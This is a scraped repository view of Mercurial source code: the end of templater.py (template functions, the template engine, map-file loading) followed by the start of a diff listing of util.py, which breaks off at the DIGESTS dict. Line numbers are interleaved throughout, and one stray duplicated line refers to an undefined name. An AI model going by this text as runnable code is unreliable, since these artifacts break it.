@templatefunc('min(iterable)')
def min_(context, mapping, args, **kwargs):
    """Return the min of an iterable"""
    if len(args) != 1:
        # i18n: "min" is a keyword
        # grammar fix: "one arguments" -> "one argument"
        raise error.ParseError(_("min expects one argument"))

    iterable = evalfuncarg(context, mapping, args[0])
    try:
        return min(iterable)
    except (TypeError, ValueError):
        # empty or non-iterable input raises ValueError/TypeError
        # i18n: "min" is a keyword
        raise error.ParseError(_("min first argument should be an iterable"))
870
870
@templatefunc('mod(a, b)')
def mod(context, mapping, args):
    """Calculate a mod b such that a / b + a mod b == a"""
    if not len(args) == 2:
        # i18n: "mod" is a keyword
        raise error.ParseError(_("mod expects two arguments"))

    # delegate evaluation and integer coercion to the arithmetic runner
    func = lambda a, b: a % b
    return runarithmetic(context, mapping, (func, args[0], args[1]))
880
880
@templatefunc('obsfatedate(markers)')
def obsfatedate(context, mapping, args):
    """Compute obsfate related information based on markers (EXPERIMENTAL)"""
    if len(args) != 1:
        # i18n: "obsfatedate" is a keyword
        # grammar fix: "one arguments" -> "one argument"
        raise error.ParseError(_("obsfatedate expects one argument"))

    markers = evalfuncarg(context, mapping, args[0])

    try:
        data = obsutil.markersdates(markers)
        return templatekw.hybridlist(data, name='date', fmt='%d %d')
    except (TypeError, KeyError):
        # i18n: "obsfatedate" is a keyword
        errmsg = _("obsfatedate first argument should be an iterable")
        raise error.ParseError(errmsg)
897
897
@templatefunc('obsfateusers(markers)')
def obsfateusers(context, mapping, args):
    """Compute obsfate related information based on markers (EXPERIMENTAL)"""
    if len(args) != 1:
        # i18n: "obsfateusers" is a keyword
        # grammar fix: "one arguments" -> "one argument"
        raise error.ParseError(_("obsfateusers expects one argument"))

    markers = evalfuncarg(context, mapping, args[0])

    try:
        data = obsutil.markersusers(markers)
        return templatekw.hybridlist(data, name='user')
    except (TypeError, KeyError, ValueError):
        # i18n: "obsfateusers" is a keyword
        # NOTE(review): "obsmakers" looks like a typo for "obsmarkers" —
        # left untouched since this exact string may be pinned by tests
        msg = _("obsfateusers first argument should be an iterable of "
                "obsmakers")
        raise error.ParseError(msg)
915
915
@templatefunc('obsfateverb(successors)')
def obsfateverb(context, mapping, args):
    """Compute obsfate related information based on successors (EXPERIMENTAL)"""
    if len(args) != 1:
        # i18n: "obsfateverb" is a keyword
        # grammar fix: "one arguments" -> "one argument"
        raise error.ParseError(_("obsfateverb expects one argument"))

    successors = evalfuncarg(context, mapping, args[0])

    try:
        return obsutil.successorsetverb(successors)
    except TypeError:
        # i18n: "obsfateverb" is a keyword
        errmsg = _("obsfateverb first argument should be countable")
        raise error.ParseError(errmsg)
931
931
@templatefunc('relpath(path)')
def relpath(context, mapping, args):
    """Convert a repository-absolute path into a filesystem path relative to
    the current working directory."""
    if len(args) != 1:
        # i18n: "relpath" is a keyword
        raise error.ParseError(_("relpath expects one argument"))

    repo = mapping['ctx'].repo()
    path = evalstring(context, mapping, args[0])
    return repo.pathto(path)
943
943
@templatefunc('revset(query[, formatargs...])')
def revset(context, mapping, args):
    """Execute a revision set query. See
    :hg:`help revset`."""
    if not len(args) > 0:
        # i18n: "revset" is a keyword
        raise error.ParseError(_("revset expects one or more arguments"))

    raw = evalstring(context, mapping, args[0])
    ctx = mapping['ctx']
    repo = ctx.repo()

    def query(expr):
        m = revsetmod.match(repo.ui, expr, repo=repo)
        return m(repo)

    if len(args) > 1:
        # extra arguments are spliced into the query via formatspec; the
        # result depends on them, so it is not cached
        formatargs = [evalfuncarg(context, mapping, a) for a in args[1:]]
        revs = query(revsetlang.formatspec(raw, *formatargs))
        revs = list(revs)
    else:
        # plain queries are cached per template run, keyed by the raw string
        revsetcache = mapping['cache'].setdefault("revsetcache", {})
        if raw in revsetcache:
            revs = revsetcache[raw]
        else:
            revs = query(raw)
            revs = list(revs)
            revsetcache[raw] = revs

    return templatekw.showrevslist("revision", revs, **mapping)
974
974
@templatefunc('rstdoc(text, style)')
def rstdoc(context, mapping, args):
    """Format reStructuredText."""
    if len(args) != 2:
        # i18n: "rstdoc" is a keyword
        raise error.ParseError(_("rstdoc expects two arguments"))

    source = evalstring(context, mapping, args[0])
    fmtstyle = evalstring(context, mapping, args[1])
    # keep 'verbose'-gated sections when rendering
    return minirst.format(source, style=fmtstyle, keep=['verbose'])
986
986
@templatefunc('separate(sep, args)', argspec='sep *args')
def separate(context, mapping, args):
    """Add a separator between non-empty arguments."""
    if 'sep' not in args:
        # i18n: "separate" is a keyword
        raise error.ParseError(_("separate expects at least one argument"))

    sep = evalstring(context, mapping, args['sep'])
    yieldedany = False
    for arg in args['args']:
        text = evalstring(context, mapping, arg)
        if not text:
            # empty pieces contribute neither text nor a separator
            continue
        if yieldedany:
            yield sep
        yield text
        yieldedany = True
1005
1005
@templatefunc('shortest(node, minlength=4)')
def shortest(context, mapping, args):
    """Obtain the shortest representation of
    a node."""
    if not (1 <= len(args) <= 2):
        # i18n: "shortest" is a keyword
        raise error.ParseError(_("shortest() expects one or two arguments"))

    node = evalstring(context, mapping, args[0])

    minlength = 4
    if len(args) > 1:
        minlength = evalinteger(context, mapping, args[1],
                                # i18n: "shortest" is a keyword
                                _("shortest() expects an integer minlength"))

    # _partialmatch() of filtered changelog could take O(len(repo)) time,
    # which would be unacceptably slow. so we look for hash collision in
    # unfiltered space, which means some hashes may be slightly longer.
    cl = mapping['ctx']._repo.unfiltered().changelog

    def isvalid(prefix):
        # a prefix is usable iff it resolves unambiguously to one node and
        # cannot be misread as a revision number
        try:
            if cl._partialmatch(prefix) is None:
                return False

            try:
                i = int(prefix)
                # if we are a pure int, then starting with zero will not be
                # confused as a rev; or, obviously, if the int is larger than
                # the value of the tip rev
                if prefix[0] == '0' or i > len(cl):
                    return True
                return False
            except ValueError:
                # not numeric, so no rev-number ambiguity
                return True
        except error.RevlogError:
            return False
        except error.WdirUnsupported:
            # single 'ff...' match
            return True

    best = node
    startlength = max(6, minlength)
    length = startlength
    # probe downward from startlength while prefixes stay valid; back off
    # upward on ambiguity until a valid prefix (or the full node) is found
    while True:
        candidate = node[:length]
        if isvalid(candidate):
            best = candidate
            if length == minlength or length > startlength:
                return best
            length -= 1
        else:
            length += 1
            if len(best) <= length:
                return best
1061
1061
@templatefunc('strip(text[, chars])')
def strip(context, mapping, args):
    """Strip characters from a string. By default,
    strips all leading and trailing whitespace."""
    if not (1 <= len(args) <= 2):
        # i18n: "strip" is a keyword
        raise error.ParseError(_("strip expects one or two arguments"))

    text = evalstring(context, mapping, args[0])
    if len(args) == 2:
        return text.strip(evalstring(context, mapping, args[1]))
    return text.strip()
1075
1075
@templatefunc('sub(pattern, replacement, expression)')
def sub(context, mapping, args):
    """Perform text substitution
    using regular expressions."""
    if len(args) != 3:
        # i18n: "sub" is a keyword
        raise error.ParseError(_("sub expects three arguments"))

    pat = evalstring(context, mapping, args[0])
    rpl = evalstring(context, mapping, args[1])
    src = evalstring(context, mapping, args[2])
    # compile separately so a bad pattern and a bad replacement produce
    # distinct error messages
    try:
        compiled = re.compile(pat)
    except re.error:
        # i18n: "sub" is a keyword
        raise error.ParseError(_("sub got an invalid pattern: %s") % pat)
    try:
        yield compiled.sub(rpl, src)
    except re.error:
        # i18n: "sub" is a keyword
        raise error.ParseError(_("sub got an invalid replacement: %s") % rpl)
1097
1097
@templatefunc('startswith(pattern, text)')
def startswith(context, mapping, args):
    """Returns the value from the "text" argument
    if it begins with the content from the "pattern" argument."""
    if len(args) != 2:
        # i18n: "startswith" is a keyword
        raise error.ParseError(_("startswith expects two arguments"))

    patn = evalstring(context, mapping, args[0])
    text = evalstring(context, mapping, args[1])
    # empty string signals "no match" to the template engine
    return text if text.startswith(patn) else ''
1111
1111
@templatefunc('word(number, text[, separator])')
def word(context, mapping, args):
    """Return the nth word from a string."""
    if not (2 <= len(args) <= 3):
        # i18n: "word" is a keyword
        raise error.ParseError(_("word expects two or three arguments, got %d")
                               % len(args))

    num = evalinteger(context, mapping, args[0],
                      # i18n: "word" is a keyword
                      _("word expects an integer index"))
    text = evalstring(context, mapping, args[1])
    # None means "split on any whitespace", matching str.split() semantics
    splitter = None
    if len(args) == 3:
        splitter = evalstring(context, mapping, args[2])

    tokens = text.split(splitter)
    # out-of-range indexes (positive or negative) yield the empty string
    if -len(tokens) <= num < len(tokens):
        return tokens[num]
    return ''
1134
1134
# methods to interpret function arguments or inner expressions (e.g. {_(x)})
exprmethods = {
    # leaf nodes
    "integer": lambda e, c: (runinteger, e[1]),
    "string": lambda e, c: (runstring, e[1]),
    "symbol": lambda e, c: (runsymbol, e[1]),
    "template": buildtemplate,
    "group": lambda e, c: compileexp(e[1], c, exprmethods),
    # ".": buildmember,
    # operators
    "|": buildfilter,
    "%": buildmap,
    "func": buildfunc,
    "keyvalue": buildkeyvaluepair,
    # arithmetic ('/' is floor division, matching integer semantics)
    "+": lambda e, c: buildarithmetic(e, c, lambda a, b: a + b),
    "-": lambda e, c: buildarithmetic(e, c, lambda a, b: a - b),
    "negate": buildnegate,
    "*": lambda e, c: buildarithmetic(e, c, lambda a, b: a * b),
    "/": lambda e, c: buildarithmetic(e, c, lambda a, b: a // b),
    }
1153
1153
# methods to interpret top-level template (e.g. {x}, {x|_}, {x % "y"})
methods = dict(exprmethods)
methods["integer"] = exprmethods["symbol"]  # '{1}' as variable
1157
1157
class _aliasrules(parser.basealiasrules):
    """Parsing and expansion rule set of template aliases"""
    _section = _('template alias')
    _parse = staticmethod(_parseexpr)

    @staticmethod
    def _trygetfunc(tree):
        """Return (name, args) if tree is func(...) or ...|filter; otherwise
        None"""
        kind = tree[0]
        if kind == 'func' and tree[1][0] == 'symbol':
            # func(args...): name from the symbol node, args from the list
            return tree[1][1], getlist(tree[2])
        if kind == '|' and tree[2][0] == 'symbol':
            # expr|filter is equivalent to filter(expr)
            return tree[2][1], [tree[1]]
1171
1171
def expandaliases(tree, aliases):
    """Return new tree of aliases are expanded"""
    # build the alias lookup table once, then rewrite the parse tree
    return _aliasrules.expand(_aliasrules.buildmap(aliases), tree)
1175 return _aliasrules.expand(aliasmap, tree)
1176
1176
# template engine

# re-export for convenience; flattens any template output into bytes
stringify = templatefilters.stringify
1180
1180
def _flatten(thing):
    '''yield a single stream from a possibly nested set of iterators'''
    thing = templatekw.unwraphybrid(thing)
    if isinstance(thing, bytes):
        yield thing
    elif thing is None:
        # None contributes nothing to the output stream
        pass
    elif not util.safehasattr(thing, '__iter__'):
        yield pycompat.bytestr(thing)
    else:
        # the first nesting level is handled inline (an unrolled copy of the
        # checks above); deeper levels recurse
        for item in thing:
            item = templatekw.unwraphybrid(item)
            if isinstance(item, bytes):
                yield item
            elif item is None:
                pass
            elif not util.safehasattr(item, '__iter__'):
                yield pycompat.bytestr(item)
            else:
                for sub in _flatten(item):
                    yield sub
1202
1202
def unquotestring(s):
    '''unwrap quotes if any; otherwise returns unmodified string'''
    # only strip when the string is long enough to hold a quote pair and
    # starts and ends with the same quote character
    if len(s) >= 2 and s[0] == s[-1] and s[0] in "'\"":
        return s[1:-1]
    return s
1208
1208
class engine(object):
    '''template expansion engine.

    template expansion works like this. a map file contains key=value
    pairs. if value is quoted, it is treated as string. otherwise, it
    is treated as name of template file.

    templater is asked to expand a key in map. it looks up key, and
    looks for strings like this: {foo}. it expands {foo} by looking up
    foo in map, and substituting it. expansion is recursive: it stops
    when there is no more {foo} to replace.

    expansion also allows formatting and filtering.

    format uses key to expand each item in list. syntax is
    {key%format}.

    filter uses function to transform value. syntax is
    {key|filter1|filter2|...}.'''

    def __init__(self, loader, filters=None, defaults=None, aliases=()):
        # loader: callable mapping a template name to its raw text
        self._loader = loader
        self._filters = {} if filters is None else filters
        self._defaults = {} if defaults is None else defaults
        self._aliasmap = _aliasrules.buildmap(aliases)
        self._cache = {}  # key: (func, data)

    def _load(self, t):
        '''load, parse, and cache a template'''
        if t not in self._cache:
            # put poison to cut recursion while compiling 't'
            self._cache[t] = (_runrecursivesymbol, t)
            try:
                tree = parse(self._loader(t))
                if self._aliasmap:
                    tree = _aliasrules.expand(self._aliasmap, tree)
                self._cache[t] = compileexp(tree, self, methods)
            except: # re-raises
                # drop the poison entry so a later load can retry
                del self._cache[t]
                raise
        return self._cache[t]

    def process(self, t, mapping):
        '''Perform expansion. t is name of map element to expand.
        mapping contains added elements for use during expansion. Is a
        generator.'''
        func, data = self._load(t)
        return _flatten(func(self, mapping, data))
1261
1261
# registry of engine implementations, keyed by engine type name
engines = {'default': engine}
1263
1263
def stylelist():
    """Return a comma-separated, sorted list of available style names.

    Styles are discovered by scanning the first template path for files
    named ``map-cmdline.<style>``; backup/reject files are ignored.
    Returns a human-readable message when no template path exists.
    """
    paths = templatepaths()
    if not paths:
        return _('no templates found, try `hg debuginstall` for more info')
    # NOTE: originally the accumulator shadowed this function's own name
    # ('stylelist') and the loop variable shadowed the Python 2 builtin
    # 'file'; both are renamed here.
    styles = []
    for filename in os.listdir(paths[0]):
        parts = filename.split(".")
        if parts[-1] in ('orig', 'rej'):
            # skip backup/reject leftovers from patching
            continue
        if parts[0] == "map-cmdline":
            styles.append(parts[1])
    return ", ".join(sorted(styles))
1277
1277
def _readmapfile(mapfile):
    """Load template elements from the given map file"""
    if not os.path.exists(mapfile):
        raise error.Abort(_("style '%s' not found") % mapfile,
                          hint=_("available styles: %s") % stylelist())

    base = os.path.dirname(mapfile)
    conf = config.config(includepaths=templatepaths())
    conf.read(mapfile)

    cache = {}  # key -> inline (quoted) template text
    tmap = {}   # key -> (engine type, template file path)
    for key, val in conf[''].items():
        if not val:
            raise error.ParseError(_('missing value'), conf.source('', key))
        if val[0] in "'\"":
            # quoted value: inline template string
            if val[0] != val[-1]:
                raise error.ParseError(_('unmatched quotes'),
                                       conf.source('', key))
            cache[key] = unquotestring(val)
        elif key == "__base__":
            # treat as a pointer to a base class for this style
            path = util.normpath(os.path.join(base, val))

            # fallback check in template paths
            if not os.path.exists(path):
                for incdir in templatepaths():
                    candidate = util.normpath(os.path.join(incdir, val))
                    if os.path.isfile(candidate):
                        path = candidate
                        break
                    mapcandidate = util.normpath(
                        os.path.join(candidate, "map"))
                    if os.path.isfile(mapcandidate):
                        path = mapcandidate
                        break

            # entries from the base style never override local ones
            bcache, btmap = _readmapfile(path)
            for k in bcache:
                if k not in cache:
                    cache[k] = bcache[k]
            for k in btmap:
                if k not in tmap:
                    tmap[k] = btmap[k]
        else:
            # unquoted value: "enginetype:relative/path" or bare path
            # (engine type defaults to 'default')
            ttype, tpath = 'default', val
            if ':' in tpath:
                ttype, tpath = tpath.split(':', 1)
            tmap[key] = ttype, os.path.join(base, tpath)
    return cache, tmap
1327
1327
class TemplateNotFound(error.Abort):
    """Raised when a requested template name is not in the template map."""
1330
1330
class templater(object):

    def __init__(self, filters=None, defaults=None, cache=None, aliases=(),
                 minchunk=1024, maxchunk=65536):
        '''set up template engine.
        filters is dict of functions. each transforms a value into another.
        defaults is dict of default map definitions.
        aliases is list of alias (name, replacement) pairs.
        '''
        self.cache = {} if cache is None else cache.copy()
        self.map = {}
        # user filters extend (and may override) the built-in filter set
        self.filters = templatefilters.filters.copy()
        self.filters.update({} if filters is None else filters)
        self.defaults = {} if defaults is None else defaults
        self._aliases = aliases
        self.minchunk, self.maxchunk = minchunk, maxchunk
        self.ecache = {}  # engine type -> engine instance

    @classmethod
    def frommapfile(cls, mapfile, filters=None, defaults=None, cache=None,
                    minchunk=1024, maxchunk=65536):
        """Create templater from the specified map file"""
        t = cls(filters, defaults, cache, [], minchunk, maxchunk)
        cache, tmap = _readmapfile(mapfile)
        t.cache.update(cache)
        t.map = tmap
        return t

    def __contains__(self, key):
        return key in self.cache or key in self.map

    def load(self, t):
        '''Get the template for the given template name. Use a local cache.'''
        if t not in self.cache:
            try:
                self.cache[t] = util.readfile(self.map[t][1])
            except KeyError as inst:
                # unknown template name
                raise TemplateNotFound(_('"%s" not in template map')
                                       % inst.args[0])
            except IOError as inst:
                # mapped file exists in the map but cannot be read;
                # re-raise with the file name for context
                raise IOError(inst.args[0], _('template file %s: %s')
                              % (self.map[t][1], inst.args[1]))
        return self.cache[t]

    def render(self, mapping):
        """Render the default unnamed template and return result as string"""
        return stringify(self('', **mapping))

    def __call__(self, t, **mapping):
        mapping = pycompat.byteskwargs(mapping)
        # pick the engine type declared in the map, falling back to 'default'
        ttype = t in self.map and self.map[t][0] or 'default'
        if ttype not in self.ecache:
            try:
                ecls = engines[ttype]
            except KeyError:
                raise error.Abort(_('invalid template engine: %s') % ttype)
            self.ecache[ttype] = ecls(self.load, self.filters, self.defaults,
                                      self._aliases)
        eng = self.ecache[ttype]

        stream = eng.process(t, mapping)
        if self.minchunk:
            # coalesce tiny yields into progressively larger chunks
            stream = util.increasingchunks(stream, min=self.minchunk,
                                           max=self.maxchunk)
        return stream
1402
1402
def templatepaths():
    '''return locations used for template files.'''
    candidates = [os.path.normpath(os.path.join(util.datapath, rel))
                  for rel in ['templates']]
    # only keep directories that actually exist
    return [p for p in candidates if os.path.isdir(p)]
1409
1409
def templatepath(name):
    '''return location of template file. returns None if not found.'''
    for directory in templatepaths():
        candidate = os.path.join(directory, name)
        if os.path.exists(candidate):
            return candidate
    return None
1417
1417
def stylemap(styles, paths=None):
    """Return path to mapfile for a given style.

    Searches mapfile in the following locations:
    1. templatepath/style/map
    2. templatepath/map-style
    3. templatepath/map
    """

    if paths is None:
        paths = templatepaths()
    elif isinstance(paths, str):
        paths = [paths]

    if isinstance(styles, str):
        styles = [styles]

    for style in styles:
        # only plain name is allowed to honor template paths
        if (not style
            or style in (os.curdir, os.pardir)
            or pycompat.ossep in style
            or pycompat.osaltsep and pycompat.osaltsep in style):
            continue
        # candidate locations, most specific first
        locations = [os.path.join(style, 'map'), 'map-' + style, 'map']

        for path in paths:
            for location in locations:
                mapfile = os.path.join(path, location)
                if os.path.isfile(mapfile):
                    return style, mapfile

    raise RuntimeError("No hgweb templates found in %r" % paths)
1452
1452
def loadfunction(ui, extname, registrarobj):
    """Load template function from specified registrarobj
    """
    # copy every function registered by the extension into the global table
    for funcname, impl in registrarobj._table.iteritems():
        funcs[funcname] = impl

# tell hggettext to extract docstrings from these functions:
i18nfunctions = funcs.values()
@@ -1,3769 +1,3769 b''
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import bz2
19 import bz2
20 import calendar
20 import calendar
21 import codecs
21 import codecs
22 import collections
22 import collections
23 import contextlib
23 import contextlib
24 import datetime
24 import datetime
25 import errno
25 import errno
26 import gc
26 import gc
27 import hashlib
27 import hashlib
28 import imp
28 import imp
29 import os
29 import os
30 import platform as pyplatform
30 import platform as pyplatform
31 import re as remod
31 import re as remod
32 import shutil
32 import shutil
33 import signal
33 import signal
34 import socket
34 import socket
35 import stat
35 import stat
36 import string
36 import string
37 import subprocess
37 import subprocess
38 import sys
38 import sys
39 import tempfile
39 import tempfile
40 import textwrap
40 import textwrap
41 import time
41 import time
42 import traceback
42 import traceback
43 import warnings
43 import warnings
44 import zlib
44 import zlib
45
45
46 from . import (
46 from . import (
47 encoding,
47 encoding,
48 error,
48 error,
49 i18n,
49 i18n,
50 policy,
50 policy,
51 pycompat,
51 pycompat,
52 )
52 )
53
53
54 base85 = policy.importmod(r'base85')
54 base85 = policy.importmod(r'base85')
55 osutil = policy.importmod(r'osutil')
55 osutil = policy.importmod(r'osutil')
56 parsers = policy.importmod(r'parsers')
56 parsers = policy.importmod(r'parsers')
57
57
58 b85decode = base85.b85decode
58 b85decode = base85.b85decode
59 b85encode = base85.b85encode
59 b85encode = base85.b85encode
60
60
61 cookielib = pycompat.cookielib
61 cookielib = pycompat.cookielib
62 empty = pycompat.empty
62 empty = pycompat.empty
63 httplib = pycompat.httplib
63 httplib = pycompat.httplib
64 httpserver = pycompat.httpserver
64 httpserver = pycompat.httpserver
65 pickle = pycompat.pickle
65 pickle = pycompat.pickle
66 queue = pycompat.queue
66 queue = pycompat.queue
67 socketserver = pycompat.socketserver
67 socketserver = pycompat.socketserver
68 stderr = pycompat.stderr
68 stderr = pycompat.stderr
69 stdin = pycompat.stdin
69 stdin = pycompat.stdin
70 stdout = pycompat.stdout
70 stdout = pycompat.stdout
71 stringio = pycompat.stringio
71 stringio = pycompat.stringio
72 urlerr = pycompat.urlerr
72 urlerr = pycompat.urlerr
73 urlreq = pycompat.urlreq
73 urlreq = pycompat.urlreq
74 xmlrpclib = pycompat.xmlrpclib
74 xmlrpclib = pycompat.xmlrpclib
75
75
76 # workaround for win32mbcs
76 # workaround for win32mbcs
77 _filenamebytestr = pycompat.bytestr
77 _filenamebytestr = pycompat.bytestr
78
78
79 def isatty(fp):
79 def isatty(fp):
80 try:
80 try:
81 return fp.isatty()
81 return fp.isatty()
82 except AttributeError:
82 except AttributeError:
83 return False
83 return False
84
84
85 # glibc determines buffering on first write to stdout - if we replace a TTY
85 # glibc determines buffering on first write to stdout - if we replace a TTY
86 # destined stdout with a pipe destined stdout (e.g. pager), we want line
86 # destined stdout with a pipe destined stdout (e.g. pager), we want line
87 # buffering
87 # buffering
88 if isatty(stdout):
88 if isatty(stdout):
89 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
89 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
90
90
91 if pycompat.osname == 'nt':
91 if pycompat.osname == 'nt':
92 from . import windows as platform
92 from . import windows as platform
93 stdout = platform.winstdout(stdout)
93 stdout = platform.winstdout(stdout)
94 else:
94 else:
95 from . import posix as platform
95 from . import posix as platform
96
96
97 _ = i18n._
97 _ = i18n._
98
98
99 bindunixsocket = platform.bindunixsocket
99 bindunixsocket = platform.bindunixsocket
100 cachestat = platform.cachestat
100 cachestat = platform.cachestat
101 checkexec = platform.checkexec
101 checkexec = platform.checkexec
102 checklink = platform.checklink
102 checklink = platform.checklink
103 copymode = platform.copymode
103 copymode = platform.copymode
104 executablepath = platform.executablepath
104 executablepath = platform.executablepath
105 expandglobs = platform.expandglobs
105 expandglobs = platform.expandglobs
106 explainexit = platform.explainexit
106 explainexit = platform.explainexit
107 findexe = platform.findexe
107 findexe = platform.findexe
108 gethgcmd = platform.gethgcmd
108 gethgcmd = platform.gethgcmd
109 getuser = platform.getuser
109 getuser = platform.getuser
110 getpid = os.getpid
110 getpid = os.getpid
111 groupmembers = platform.groupmembers
111 groupmembers = platform.groupmembers
112 groupname = platform.groupname
112 groupname = platform.groupname
113 hidewindow = platform.hidewindow
113 hidewindow = platform.hidewindow
114 isexec = platform.isexec
114 isexec = platform.isexec
115 isowner = platform.isowner
115 isowner = platform.isowner
116 listdir = osutil.listdir
116 listdir = osutil.listdir
117 localpath = platform.localpath
117 localpath = platform.localpath
118 lookupreg = platform.lookupreg
118 lookupreg = platform.lookupreg
119 makedir = platform.makedir
119 makedir = platform.makedir
120 nlinks = platform.nlinks
120 nlinks = platform.nlinks
121 normpath = platform.normpath
121 normpath = platform.normpath
122 normcase = platform.normcase
122 normcase = platform.normcase
123 normcasespec = platform.normcasespec
123 normcasespec = platform.normcasespec
124 normcasefallback = platform.normcasefallback
124 normcasefallback = platform.normcasefallback
125 openhardlinks = platform.openhardlinks
125 openhardlinks = platform.openhardlinks
126 oslink = platform.oslink
126 oslink = platform.oslink
127 parsepatchoutput = platform.parsepatchoutput
127 parsepatchoutput = platform.parsepatchoutput
128 pconvert = platform.pconvert
128 pconvert = platform.pconvert
129 poll = platform.poll
129 poll = platform.poll
130 popen = platform.popen
130 popen = platform.popen
131 posixfile = platform.posixfile
131 posixfile = platform.posixfile
132 quotecommand = platform.quotecommand
132 quotecommand = platform.quotecommand
133 readpipe = platform.readpipe
133 readpipe = platform.readpipe
134 rename = platform.rename
134 rename = platform.rename
135 removedirs = platform.removedirs
135 removedirs = platform.removedirs
136 samedevice = platform.samedevice
136 samedevice = platform.samedevice
137 samefile = platform.samefile
137 samefile = platform.samefile
138 samestat = platform.samestat
138 samestat = platform.samestat
139 setbinary = platform.setbinary
139 setbinary = platform.setbinary
140 setflags = platform.setflags
140 setflags = platform.setflags
141 setsignalhandler = platform.setsignalhandler
141 setsignalhandler = platform.setsignalhandler
142 shellquote = platform.shellquote
142 shellquote = platform.shellquote
143 spawndetached = platform.spawndetached
143 spawndetached = platform.spawndetached
144 split = platform.split
144 split = platform.split
145 sshargs = platform.sshargs
145 sshargs = platform.sshargs
146 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
146 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
147 statisexec = platform.statisexec
147 statisexec = platform.statisexec
148 statislink = platform.statislink
148 statislink = platform.statislink
149 testpid = platform.testpid
149 testpid = platform.testpid
150 umask = platform.umask
150 umask = platform.umask
151 unlink = platform.unlink
151 unlink = platform.unlink
152 username = platform.username
152 username = platform.username
153
153
154 try:
154 try:
155 recvfds = osutil.recvfds
155 recvfds = osutil.recvfds
156 except AttributeError:
156 except AttributeError:
157 pass
157 pass
158 try:
158 try:
159 setprocname = osutil.setprocname
159 setprocname = osutil.setprocname
160 except AttributeError:
160 except AttributeError:
161 pass
161 pass
162
162
163 # Python compatibility
163 # Python compatibility
164
164
165 _notset = object()
165 _notset = object()
166
166
167 # disable Python's problematic floating point timestamps (issue4836)
167 # disable Python's problematic floating point timestamps (issue4836)
168 # (Python hypocritically says you shouldn't change this behavior in
168 # (Python hypocritically says you shouldn't change this behavior in
169 # libraries, and sure enough Mercurial is not a library.)
169 # libraries, and sure enough Mercurial is not a library.)
170 os.stat_float_times(False)
170 os.stat_float_times(False)
171
171
172 def safehasattr(thing, attr):
172 def safehasattr(thing, attr):
173 return getattr(thing, attr, _notset) is not _notset
173 return getattr(thing, attr, _notset) is not _notset
174
174
175 def bytesinput(fin, fout, *args, **kwargs):
175 def bytesinput(fin, fout, *args, **kwargs):
176 sin, sout = sys.stdin, sys.stdout
176 sin, sout = sys.stdin, sys.stdout
177 try:
177 try:
178 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
178 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
179 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
179 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
180 finally:
180 finally:
181 sys.stdin, sys.stdout = sin, sout
181 sys.stdin, sys.stdout = sin, sout
182
182
183 def bitsfrom(container):
183 def bitsfrom(container):
184 bits = 0
184 bits = 0
185 for bit in container:
185 for bit in container:
186 bits |= bit
186 bits |= bit
187 return bits
187 return bits
188
188
189 # python 2.6 still have deprecation warning enabled by default. We do not want
189 # python 2.6 still have deprecation warning enabled by default. We do not want
190 # to display anything to standard user so detect if we are running test and
190 # to display anything to standard user so detect if we are running test and
191 # only use python deprecation warning in this case.
191 # only use python deprecation warning in this case.
192 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
192 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
193 if _dowarn:
193 if _dowarn:
194 # explicitly unfilter our warning for python 2.7
194 # explicitly unfilter our warning for python 2.7
195 #
195 #
196 # The option of setting PYTHONWARNINGS in the test runner was investigated.
196 # The option of setting PYTHONWARNINGS in the test runner was investigated.
197 # However, module name set through PYTHONWARNINGS was exactly matched, so
197 # However, module name set through PYTHONWARNINGS was exactly matched, so
198 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
198 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
199 # makes the whole PYTHONWARNINGS thing useless for our usecase.
199 # makes the whole PYTHONWARNINGS thing useless for our usecase.
200 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
200 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
201 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
201 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
202 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
202 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
203
203
204 def nouideprecwarn(msg, version, stacklevel=1):
204 def nouideprecwarn(msg, version, stacklevel=1):
205 """Issue an python native deprecation warning
205 """Issue an python native deprecation warning
206
206
207 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
207 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
208 """
208 """
209 if _dowarn:
209 if _dowarn:
210 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
210 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
211 " update your code.)") % version
211 " update your code.)") % version
212 warnings.warn(msg, DeprecationWarning, stacklevel + 1)
212 warnings.warn(msg, DeprecationWarning, stacklevel + 1)
213
213
214 DIGESTS = {
214 DIGESTS = {
215 'md5': hashlib.md5,
215 'md5': hashlib.md5,
216 'sha1': hashlib.sha1,
216 'sha1': hashlib.sha1,
217 'sha512': hashlib.sha512,
